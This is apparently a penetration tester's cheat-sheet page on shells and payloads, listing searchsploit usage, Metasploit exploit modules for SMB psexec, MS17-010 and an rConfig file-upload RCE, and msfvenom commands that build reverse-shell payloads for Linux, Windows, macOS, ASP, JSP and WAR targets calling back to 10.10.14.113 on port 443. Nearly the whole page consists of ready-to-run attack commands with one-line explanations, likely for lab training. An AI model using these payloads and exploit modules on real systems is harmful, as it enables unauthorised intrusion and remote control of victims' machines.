Shells and Payloads
Last updated
Was this helpful?
Last updated
Was this helpful?
There are many different ways to "pop" a reverse shell. Check out the different paylads provided in my notes, but keep in mind that there are many different resources online
Install & update: sudo apt update && sudo apt install exploitdb
You can serach for exploits using tags such as: searchsploit remote smb microsoft window
Copy a script to the current directory: searchsploit -m windows/remote/48537.py
use exploit/windows/smb/psexec
Metasploit exploit module that can be used on vulnerable Windows system to establish a shell session utilizing smb & psexec
shell
Command used in a meterpreter shell session to drop into a system shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > nameoffile.elf
MSFvenom command used to generate a linux-based reverse shell stageless payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f exe > nameoffile.exe
MSFvenom command used to generate a Windows-based reverse shell stageless payload
msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f macho > nameoffile.macho
MSFvenom command used to generate a MacOS-based reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.113 LPORT=443 -f asp > nameoffile.asp
MSFvenom command used to generate a ASP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f raw > nameoffile.jsp
MSFvenom command used to generate a JSP web reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f war > nameoffile.war
MSFvenom command used to generate a WAR java/jsp compatible web reverse shell payload
use auxiliary/scanner/smb/smb_ms17_010
Metasploit exploit module used to check if a host is vulnerable to ms17_010
use exploit/windows/smb/ms17_010_psexec
Metasploit exploit module used to gain a reverse shell session on a Windows-based system that is vulnerable to ms17_010
use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
Metasploit exploit module that can be used to optain a reverse shell on a vulnerable linux system hosting rConfig 3.9.6
You can find some web shells within Kali Linux, under
/usr/share/webshells